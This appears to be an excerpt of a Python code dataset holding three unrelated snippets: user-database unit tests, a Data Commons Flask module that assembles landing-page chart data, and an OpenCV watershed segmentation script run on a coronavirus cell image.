self.db.delete_user(self.context, n_user.user_id, n_user.password)
def test_get_user_by_name(self):
user = Users.from_json(
self.get_test_date("test_get_user_by_name")
)
n_user = self.db.create_user(self.context, user)
self.assertEqual(
n_user,
self.db.get_user(self.context, user.username, user.password))
self.db.delete_user(self.context, n_user.username, n_user.password)
def test_get_user_by_phone(self):
user = Users.from_json(
self.get_test_date("test_get_user_by_phone")
)
n_user = self.db.create_user(self.context, user)
self.assertEqual(
n_user,
self.db.get_user(self.context, user.phone, user.password))
self.db.delete_user(self.context, n_user.phone, n_user.password)
def test_get_user_with_incorrect_password(self):
user = Users.from_json(
self.get_test_date("test_get_user_with_incorrect_password")
)
n_user = self.db.create_user(self.context, user)
self.assertRaises(
IncorrectPasswordException,
self.db.get_user, self.context, n_user.phone,
n_user.password + "_"
)
self.db.delete_user(self.context, n_user.id, n_user.password)
| nilq/baby-python | python |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines endpoints for the landing page.
TODO(shifucun): once this is well tested, can deprecate corresponding code
in chart.py and place.py
"""
import collections
import copy
import json
import logging
import urllib
from flask import Blueprint, current_app, Response, url_for, g
from flask_babel import gettext
from collections import defaultdict
from cache import cache
import services.datacommons as dc_service
import routes.api.place as place_api
import lib.range as lib_range
# Define blueprint
bp = Blueprint("api.landing_page", __name__, url_prefix='/api/landingpage')
BAR_CHART_TYPES = ['parent', 'similar', 'nearby', 'child']
MAX_DENOMINATOR_BACK_YEAR = 3
MIN_CHART_TO_KEEP_TOPICS = 30
OVERVIEW = 'Overview'
def get_landing_page_data(dcid, new_stat_vars):
response = dc_service.fetch_data('/landing-page', {
'place': dcid,
'newStatVars': new_stat_vars,
},
compress=False,
post=True,
has_payload=False)
return response
def build_url(dcids, statvar_to_denom, is_scaled=False):
anchor = '&place=' + ','.join(dcids)
parts = []
for statvar, denom in statvar_to_denom.items():
part = statvar
if denom:
part += '|' + denom
parts.append(part)
anchor += ('&statsVar=' + '__'.join(parts))
if is_scaled:
anchor = anchor + '&pc'
return urllib.parse.unquote(url_for('tools.timeline', _anchor=anchor))
def fill_translation(chart):
chart['title'] = gettext(chart['titleId'])
del chart['titleId']
if 'description' in chart:
del chart['description']
return chart
# TODO: add test for chart_config for assumption that each combination of stat vars will only have one config in chart_config.
def build_spec(chart_config):
"""Builds hierachical spec based on chart config."""
spec = defaultdict(lambda: defaultdict(list))
# Map: category -> topic -> [config]
for conf in chart_config:
config = copy.deepcopy(conf)
config = fill_translation(config)
if 'relatedChart' in config and config['relatedChart']['scale']:
config['relatedChart'] = fill_translation(config['relatedChart'])
is_overview = ('isOverview' in config and config['isOverview'])
category = config['category']
if 'isOverview' in config:
del config['isOverview']
del config['category']
if is_overview:
spec[OVERVIEW][category].append(copy.deepcopy(config))
spec[category][config['title']].append(config)
return spec
def get_denom(cc, related_chart=False):
"""Get the numerator and denominator map."""
# If chart requires denominator, use it for both primary and related charts.
if 'denominator' in cc:
result = {}
if len(cc['denominator']) != len(cc['statsVars']):
raise ValueError('Denominator number not matching: %s', cc)
for num, denom in zip(cc['statsVars'], cc['denominator']):
result[num] = denom
return result
# For related chart, use the denominator that is specified in the
# 'relatedChart' field if present.
if related_chart and cc.get('relatedChart', {}).get('scale', False):
return cc['relatedChart'].get('denominator', 'Count_Person')
return None
def get_series(data, place, stat_vars):
"""Get time series from the landing page data.
Aggregate for all the stat vars and return empty series if any stat var data
is missing
Returns:
series and sources.
"""
all_series = []
sources = set()
num_sv = len(stat_vars)
for sv in stat_vars:
if 'data' not in data[place] or sv not in data[place]['data']:
return {}, []
series = data[place]['data'][sv]
all_series.append(series['val'])
sources.add(series['metadata']['provenanceUrl'])
# One series, no need to aggregate
if num_sv == 1:
return all_series[0], sources
merged_series = defaultdict(list)
for series in all_series:
for date, value in series.items():
merged_series[date].append(value)
# Aggregate
agg_series = {}
for date, values in merged_series.items():
if len(values) == num_sv:
agg_series[date] = sum(values)
return agg_series, sources
def get_stat_var_group(cc, data, places):
"""Get the stat var grouping for aggregation."""
if 'aggregate' in cc:
agg_type = lib_range.get_aggregate_config(cc['aggregate'])
place_stat_vars = defaultdict(list)
for place in places:
if place not in data or 'data' not in data[place]:
continue
for sv in cc['statsVars']:
if sv in data[place]['data']:
place_stat_vars[place].append(sv)
result = lib_range.aggregate_stat_var(place_stat_vars, agg_type)
for place in places:
if place not in result:
result[place] = {}
else:
result = {}
for place in places:
result[place] = {sv: [sv] for sv in cc['statsVars']}
return result
def get_snapshot_across_places(cc, data, places):
"""Get the snapshot used for bar data across a few places.
This will scale the value if required and pick the latest date that has the
most <place, stat_var> entries.
"""
if not places:
return {}, {}
# date_to_data is a dictionary from date to place and a tuple of
# (stat_var, value) pair.
# Example:
# {
# "2018": {
# "geoId/06":[("Count_Person", 200), ("Count_Person_Female", 100)],
# "geoId/08":[("Count_Person", 300), ("Count_Person_Female", 150)],
# },
# "2017": {
# "geoId/06":[("Count_Person", 300), ("Count_Person_Female", 150)],
# "geoId/08":[("Count_Person", 400), ("Count_Person_Female", 200)],
# },
# }
date_to_data = collections.defaultdict(
lambda: collections.defaultdict(list))
# TODO(shifucun/beets): add a unittest to ensure denominator is set
# explicitly when scale==True
num_denom = get_denom(cc, related_chart=True)
sources = set()
place_stat_var_group = get_stat_var_group(cc, data, places)
statvar_to_denom = {}
for place in places:
if place not in data:
continue
stat_var_group = place_stat_var_group[place]
for num_sv, sv_list in stat_var_group.items():
num_series, num_sources = get_series(data, place, sv_list)
if not num_series:
continue
sources.update(num_sources)
if num_denom:
if isinstance(num_denom, dict):
denom_sv = num_denom[num_sv]
else:
denom_sv = num_denom
statvar_to_denom[num_sv] = denom_sv
denom_series, denom_sources = get_series(
data, place, [denom_sv])
if not denom_series:
continue
sources.update(denom_sources)
result_series = scale_series(num_series, denom_series)
else:
result_series = num_series
statvar_to_denom[num_sv] = None
# Turn the value to be keyed by date.
for date, value in result_series.items():
date_to_data[date][place].append((num_sv, value))
# Pick a date that has the most series across places.
dates = sorted(date_to_data.keys(), reverse=True)
if not dates:
return {}, {}
count = 0
chosen_date = None
for date in dates:
if len(date_to_data[date]) > count:
count = len(date_to_data[date])
chosen_date = date
result = {'date': chosen_date, 'data': [], 'sources': list(sources)}
for place in places:
points = {}
for stat_var, value in date_to_data[chosen_date][place]:
points[stat_var] = value
if points:
result['data'].append({'dcid': place, 'data': points})
return result, statvar_to_denom
# TODO(shifucun): Add unittest for these helper functions
def get_bar(cc, data, places):
"""Get the bar data across a few places.
This will scale the value if required and pick the latest date that has the
most <place, stat_var> entries.
"""
result, statvar_denom = get_snapshot_across_places(cc, data, places)
if not result:
return {}
# Should have data other than the primary place. Return empty struct to
# so client won't draw chart.
if len(result['data']) <= 1:
return {}
is_scaled = (('relatedChart' in cc and
cc['relatedChart'].get('scale', False)) or
('denominator' in cc))
result['exploreUrl'] = build_url(places, statvar_denom, is_scaled)
return result
def get_trend(cc, data, place):
"""Get the time series data for a place."""
if place not in data:
return {}
result_series = {}
sources = set()
num_denom = get_denom(cc)
stat_var_group = get_stat_var_group(cc, data, [place])[place]
statvar_denom = {}
for num_sv, sv_list in stat_var_group.items():
num_series, num_sources = get_series(data, place, sv_list)
if not num_series:
continue
sources.update(num_sources)
if num_denom:
if isinstance(num_denom, dict):
denom_sv = num_denom[num_sv]
else:
denom_sv = num_denom
denom_sv = num_denom[num_sv]
statvar_denom[num_sv] = denom_sv
denom_series, denom_sources = get_series(data, place, [denom_sv])
if not denom_series:
continue
sources.update(denom_sources)
result_series[num_sv] = scale_series(num_series, denom_series)
else:
result_series[num_sv] = num_series
statvar_denom[num_sv] = None
# filter out time series with single data point.
for sv in list(result_series.keys()):
if len(result_series[sv]) <= 1:
del result_series[sv]
if not result_series:
return {}
is_scaled = ('denominator' in cc)
return {
'series': result_series,
'sources': list(sources),
'exploreUrl': build_url([place], statvar_denom, is_scaled)
}
def get_year(date):
try:
return int(date.split('-')[0])
except IndexError:
raise ValueError('no valid date format found %s', date)
# TODO(shifucun): Add unittest.
def scale_series(numerator, denominator):
"""Scale two time series.
The date of the two time series may not be exactly aligned. Here we use
year alignment to match two date. If no denominator is found for a
numerator, then the data is removed.
"""
data = {}
for date, value in numerator.items():
if date in denominator:
if denominator[date] > 0:
data[date] = value / denominator[date]
else:
data[date] = 0
else:
try:
numerator_year = get_year(date)
for i in range(0, MAX_DENOMINATOR_BACK_YEAR + 1):
year = str(numerator_year - i)
if year in denominator:
if denominator[year] > 0:
data[date] = value / denominator[year]
else:
data[date] = 0
break
except ValueError:
return {}
return data
def get_i18n_all_child_places(raw_page_data):
all_child_places = raw_page_data.get('allChildPlaces', {})
all_dcids = []
for place_type in list(all_child_places.keys()):
for place in all_child_places[place_type]['places']:
all_dcids.append(place.get('dcid', ''))
i18n_names = place_api.get_i18n_name(all_dcids,
False) # Don't resolve en-only names
for place_type in list(all_child_places.keys()):
for place in all_child_places[place_type]['places']:
dcid = place.get('dcid')
i18n_name = i18n_names.get(dcid, '')
if i18n_name:
place['name'] = i18n_name
for place_type in list(all_child_places.keys()):
all_child_places[place_type] = all_child_places[place_type]['places']
return all_child_places
@bp.route('/data/<path:dcid>')
@cache.cached(timeout=3600 * 24, query_string=True) # Cache for one day.
def data(dcid):
"""
Get chart spec and stats data of the landing page for a given place.
"""
logging.info("Landing Page: cache miss for %s, fetch and process data ...",
dcid)
spec_and_stat = build_spec(current_app.config['CHART_CONFIG'])
new_stat_vars = current_app.config['NEW_STAT_VARS']
raw_page_data = get_landing_page_data(dcid, new_stat_vars)
if not 'statVarSeries' in raw_page_data:
logging.info("Landing Page: No data for %s", dcid)
return Response(json.dumps({}), 200, mimetype='application/json')
# Filter out Metropolitan France parent place.
parent_places = [
el for el in raw_page_data.get('parentPlaces', [])
if el != 'country/FXX'
]
raw_page_data['parentPlaces'] = parent_places
# Only US places have comparison charts.
is_usa_place = False
for place in [dcid] + raw_page_data.get('parentPlaces', []):
if place == 'country/USA':
is_usa_place = True
break
# Populate the data for each chart
all_stat = raw_page_data['statVarSeries']
for category in spec_and_stat:
if category == OVERVIEW:
if is_usa_place:
chart_types = ['nearby', 'child']
else:
chart_types = ['similar']
else:
chart_types = BAR_CHART_TYPES
for topic in spec_and_stat[category]:
for chart in spec_and_stat[category][topic]:
# Trend data
chart['trend'] = get_trend(chart, all_stat, dcid)
if 'aggregate' in chart:
aggregated_stat_vars = list(chart['trend'].get(
'series', {}).keys())
if aggregated_stat_vars:
chart['trend']['statsVars'] = aggregated_stat_vars
else:
chart['trend'] = {}
# Bar data
for t in chart_types:
chart[t] = get_bar(chart, all_stat, [dcid] +
raw_page_data.get(t + 'Places', []))
if t == 'similar' and 'data' in chart[t]:
# If no data for current place, do not serve similar
# place data.
keep_chart = False
for d in chart[t]['data']:
if d['dcid'] == dcid:
keep_chart = True
break
if not keep_chart:
chart[t] = {}
# Update stat vars for aggregated stats
if 'aggregate' in chart and chart[t]:
chart[t]['statsVars'] = []
for place_data in chart[t].get('data', []):
stat_vars = list(place_data['data'].keys())
if len(stat_vars) > len(chart[t]['statsVars']):
chart[t]['statsVars'] = stat_vars
elif len(stat_vars) == 0:
chart[t] = {}
if 'aggregate' in chart:
chart['statsVars'] = []
# Remove empty category and topics
for category in list(spec_and_stat.keys()):
for topic in list(spec_and_stat[category].keys()):
filtered_charts = []
for chart in spec_and_stat[category][topic]:
keep_chart = False
for t in ['trend'] + BAR_CHART_TYPES:
if chart.get(t, None):
keep_chart = True
break
if keep_chart:
filtered_charts.append(chart)
if not filtered_charts:
del spec_and_stat[category][topic]
else:
spec_and_stat[category][topic] = filtered_charts
if not spec_and_stat[category]:
del spec_and_stat[category]
# Only keep the "Overview" category if the number of total chart is less
# than certain threshold.
overview_set = set()
non_overview_set = set()
chart_count = 0
# Get the overview charts
for topic, charts in spec_and_stat[OVERVIEW].items():
for chart in charts:
overview_set.add((topic, chart['title']))
chart_count += 1
# Get the non overview charts
for category, topic_data in spec_and_stat.items():
if category == OVERVIEW:
continue
for topic in topic_data:
if (category, topic) not in overview_set:
non_overview_set.add((category, topic))
chart_count += 1
# If the total number of chart is too small, then merge all charts to
# the overview category and remove other categories
if chart_count < MIN_CHART_TO_KEEP_TOPICS:
for category, topic in non_overview_set:
spec_and_stat[OVERVIEW][category].extend(
spec_and_stat[category][topic])
for category in list(spec_and_stat.keys()):
if category != OVERVIEW:
del spec_and_stat[category]
# Get chart category name translations
categories = {}
for category in list(spec_and_stat.keys()) + list(spec_and_stat[OVERVIEW]):
categories[category] = gettext(f'CHART_TITLE-CHART_CATEGORY-{category}')
# Get display name for all places
all_places = [dcid]
for t in BAR_CHART_TYPES:
all_places.extend(raw_page_data.get(t + 'Places', []))
names = place_api.get_display_name('^'.join(sorted(all_places)), g.locale)
# Pick data to highlight - only population for now
population, statvar_denom = get_snapshot_across_places(
{'statsVars': ['Count_Person']}, all_stat, [dcid])
highlight = {gettext('CHART_TITLE-Population'): population}
response = {
'pageChart': spec_and_stat,
'allChildPlaces': get_i18n_all_child_places(raw_page_data),
'childPlacesType': raw_page_data.get('childPlacesType', ""),
'childPlaces': raw_page_data.get('childPlaces', []),
'parentPlaces': raw_page_data.get('parentPlaces', []),
'similarPlaces': raw_page_data.get('similarPlaces', []),
'nearbyPlaces': raw_page_data.get('nearbyPlaces', []),
'categories': categories,
'names': names,
'highlight': highlight,
}
return Response(json.dumps(response), 200, mimetype='application/json')
| nilq/baby-python | python |
# OBS
# Imagem celular original do vírus recentemente descoberto SARS-CoV-2,
# popularmente chamado de COVID-19 ou Coronavirus.
import cv2 as cv
import numpy as np
import matplotlib.pyplot as plt
!wget "https://raw.githubusercontent.com/PedroHaupenthal/Image-Processing/master/watershed/covid_19.jpg" -O "covid_19.jpg"
img1 = cv.imread("covid_19.jpg")
img1 = cv.cvtColor(img1, cv.COLOR_BGR2RGB)
img2 = cv.cvtColor(img1, cv.COLOR_RGB2GRAY)
img2 = cv.bitwise_not(img2)
ret, img2 = cv.threshold(img2,
0,
255,
cv.THRESH_BINARY_INV + cv.THRESH_OTSU)
kernel = np.ones((3,3), np.uint8)
img3 = cv.morphologyEx(img2,
cv.MORPH_CLOSE,
kernel,
iterations = 2)
img4 = cv.dilate(img3,
kernel,
iterations = 5)
img5 = cv.distanceTransform(img3,
cv.DIST_L2,
5)
ret,img6 = cv.threshold(img5,
0.65 * img5.max(),
255,
0)
img6 = np.uint8(img6)
img7 = cv.subtract(img4, img6)
ret, count = cv.connectedComponents(img6)
count = count + 1
count[img7 == 255] = 0
img8 = cv.watershed(img1, count)
img1[count == -1] = [255, 0, 0]
plt.figure(figsize=(30,30))
plt.subplot(121), plt.imshow(img1), plt.title("ORIGINAL"), plt.axis("off")
plt.subplot(122), plt.imshow(img8, cmap='jet'), plt.title("RESULTADO"), plt.axis("off")
plt.show() | nilq/baby-python | python |
Subsets and Splits